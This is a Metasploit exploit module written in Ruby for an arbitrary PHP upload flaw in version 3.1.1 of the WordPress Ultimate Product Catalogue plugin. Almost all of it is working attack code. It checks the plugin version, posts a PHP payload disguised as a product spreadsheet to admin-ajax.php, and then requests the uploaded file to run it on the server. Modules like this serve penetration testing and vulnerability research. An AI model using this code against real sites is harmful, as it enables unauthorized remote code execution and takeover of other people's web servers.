##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HTTP::Wordpress
  include Msf::Exploit::FileDropper

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'WordPress Ultimate Product Catalogue Upload Vulnerability',
      'Description'    => %q{
        This module exploits an arbitrary PHP code upload in the WordPress Ultimate Product Catalogue
        version 3.1.1. The vulnerability allows for arbitrary file upload and remote code execution.
      },
      'Author'         =>
        [
          'Luca Ercoli', # Vulnerability discovery
          'Roberto Soares Espreto <robertoespreto[at]gmail.com>'  # Metasploit module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          ['OSVDB', '121164'],
          ['WPVDB', '7939'],
          ['URL', 'http://blog.seeweb.it/wordpress-ultimate-product-catalogue-vulnerability/']
        ],
      'Privileged'     => false,
      'Platform'       => 'php',
      'Arch'           => ARCH_PHP,
      'Targets'        => [['WP Ultimate Product Caatalogue 3.1.1', {}]],
      'DisclosureDate' => 'Apr 22 2015',
      'DefaultTarget'  => 0)
    )
  end

  def check
    check_plugin_version_from_readme('ultimate-product-catalogue', '3.1.2')
  end

  def exploit
    php_pagename = rand_text_alpha(8 + rand(8)) + '.php'

    data = Rex::MIME::Message.new
    data.add_part(payload.encoded, 'application/octet-stream', nil, "form-data; name=\"Products_Spreadsheet\"; filename=\"#{php_pagename}\"")
    post_data = data.to_s

    res = send_request_cgi(
      'uri'       => wordpress_url_admin_ajax,
      'method'    => 'POST',
      'vars_get'  => {
        'action'    => 'widgets_init',
        'Action'   => 'UPCP_AddProductSpreadsheet'
      },
      'ctype'     => "multipart/form-data; boundary=#{data.bound}",
      'data'      => post_data
    )

    if res
      if res.code == 200 && res.body =~ /0/
        print_good("#{peer} - Our payload is at: #{php_pagename}.")
        register_files_for_cleanup(php_pagename)
      else
        fail_with(Failure::Unknown, "#{peer} - Unable to deploy payload, server returned #{res.code}")
      end
    else
      fail_with(Failure::Unknown, 'Server did not respond in an expected way')
    end

    print_status("#{peer} - Calling payload...")
    send_request_cgi(
      { 'uri'       => normalize_uri(wordpress_url_plugins, 'ultimate-product-catalogue', 'product-sheets', php_pagename) },
      5
    )
  end
end
